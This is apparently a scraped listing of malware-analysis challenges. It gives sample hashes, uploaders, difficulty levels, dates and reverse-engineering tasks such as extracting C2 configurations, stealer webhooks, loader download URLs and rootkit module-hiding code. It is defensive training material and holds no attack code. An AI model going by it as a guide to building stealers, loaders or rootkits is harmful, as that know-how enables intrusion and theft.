49660527c1c910ad2d3c5625c1b44682e465e45b65883dfc8d7d229d1bd0ebd8
|
struppigel
|
advanced
|
|
Extract the main.js, decompile and deobfuscate it so far that you can see the webhook
|
1
|
|
0
|
07 Mar 2026
|
161f2a6ecf64dcbbc1616d536cb2ed2e53afc5a4f5deca810b0f55cc82a6b447
|
malwarecakefactory
|
medium
|
|
for RE learning
|
1
|
|
1
|
22 Feb 2026
|
465dc7a1068d0c7d31b4ffb0a013a59ddd0320dde4389748eed99f41ee0f51ae
|
struppigel
|
medium
|
|
How does this rootkit hide loaded modules of a process? Locate the function that is responsible for that. What's necessary to trigger the module hiding?
|
โ
|
|
0
|
21 Feb 2026
|
1bc77b013c83b5b075c3d3c403da330178477843fc2d8326d90e495a61fbb01f
|
struppigel
|
advanced
|
|
Create a static C2 extractor that uses abstract syntax tree transformations with Babel. You can use astexplorer.net as helper tool.
|
1
|
|
0
|
13 Jan 2026
|
2299ff9c7e5995333691f3e68373ebbb036aa619acd61cbea6c5210490699bb6
|
struppigel
|
medium
|
|
Create a C2 extractor using a Python script, binary refinery pipeline or CyberChef recipie
|
1
|
|
0
|
11 Jan 2026
|
cb21368467bdf0ca8a4cd458f54d684e10da2d43a9c7285e094d39bdc410fb10
|
struppigel
|
medium
|
|
Unpack the payload and extract the configuration.
This is a second stage file, you find the [first stage here](https://samplepedia.cc/sample/5bc8b1a067ec4b487e88c2bb93728158633f4fdf22b111d5562cbb4ad3426d30/31/)
|
1
|
|
0
|
04 Jan 2026
|
5bc8b1a067ec4b487e88c2bb93728158633f4fdf22b111d5562cbb4ad3426d30
|
struppigel
|
medium
|
|
Deobfuscate this loader such that you get the download URL.
|
2
|
|
0
|
04 Jan 2026
|
0ad4f87dfa9b814b78e9db2360a89ea7940fb5ad919637bbaacb1222fb44098d
|
struppigel
|
medium
|
|
Write an emulation-based unpacker for this crypter. Use the native 32-bit stub and RunPE shellcode. Ignore .NET.
|
1
|
|
0
|
31 Dec 2025
|
478d992c999a0e93ada1c9aa10644e3abdc207d407492c5bc2710986de4d42be
|
struppigel
|
easy
|
|
Where does this office document get the next stage and how?
When was the document created?
|
โ
|
|
0
|
25 Apr 2026
|
060ed0ec27a0a4ad7b55425ed56d8ef0c55aa61b499d4884d1679f18d518ddf3
|
struppigel
|
medium
|
|
Find the two webhooks of this stealer and determine the persistence mechanisms.
|
โ
|
|
0
|
23 Mar 2026
|
57e497bf62138b926d4adab395e0ab64f9f1b606ff9219e0c004fcc5a8348f7a
|
struppigel
|
medium
|
|
Find the code that is responsible for loading the next stage. Figure out the download URL for the next stage with emulation.
|
โ
|
|
0
|
17 Mar 2026
|
b0e365c603013751085946ff0500f7d8c0e3c106d3b02c368c2f267279660a6d
|
struppigel
|
medium
|
|
Write a configuration extractor for this loader
|
1
|
|
0
|
28 Feb 2026
|
95a636c2b3af0bc69cc05f7b32281ff17c58cbe637bec5f8918f7514a5f37e09
|
struppigel
|
easy
|
|
Check out the LNK in this archive. It downloads malware. How does it achieve that?
|
1
|
|
0
|
21 Feb 2026
|
361f20f5843a9d609d42fc17f164eb44ed4f86ae3062e66e978c2c93890f65fd
|
struppigel
|
medium
|
|
LICENSE.txt was run via > %ALLUSERSPROFILE%\Microsoft\AppUpdate\SystemInfo\UsbService86.exe LICENSE.txt
UsbService86.exe has the signer **Python Software Foundation**
Decompile the code, then create a binary refinery pipeline to unpack the next layers.
(CyberChef might be an alternative, but I did not check if it has all necessary algorithms)
|
1
|
|
1
|
23 Jan 2026
|
4029f9fcba1c53d86f2c59f07d5657930bd5ee64cca4c5929cbd3142484e815a
|
larsborn
|
medium
|
|
Identify and reverse engineer the string deobfuscation function in this sample. Write a binary refinery pipeline to emulate it. Bonus points if you manage to write a Ghidra script.
|
1
|
|
0
|
13 Jan 2026
|
67f8302a2fd28d15f62d6d20d748bfe350334e5353cbdef112bd1f8231b5599d
|
larsborn
|
medium
|
|
Find and reverse engineer the string deobfuscation function in the sample. Create a binary refinery pipeline to decrypt the strings. Bonus points if you manage to write a Ghidra script to decrypt them all.
|
1
|
|
0
|
13 Jan 2026
|
ee69b74d0f0dd59fcd87304863626efb727ad6255bc29a7d48b7a441390dff1a
|
struppigel
|
medium
|
|
This is packed by CypherIt crypter. Unpack the malware.
Bonus: Extract the config of the payload.
|
1
|
|
0
|
11 Jan 2026
|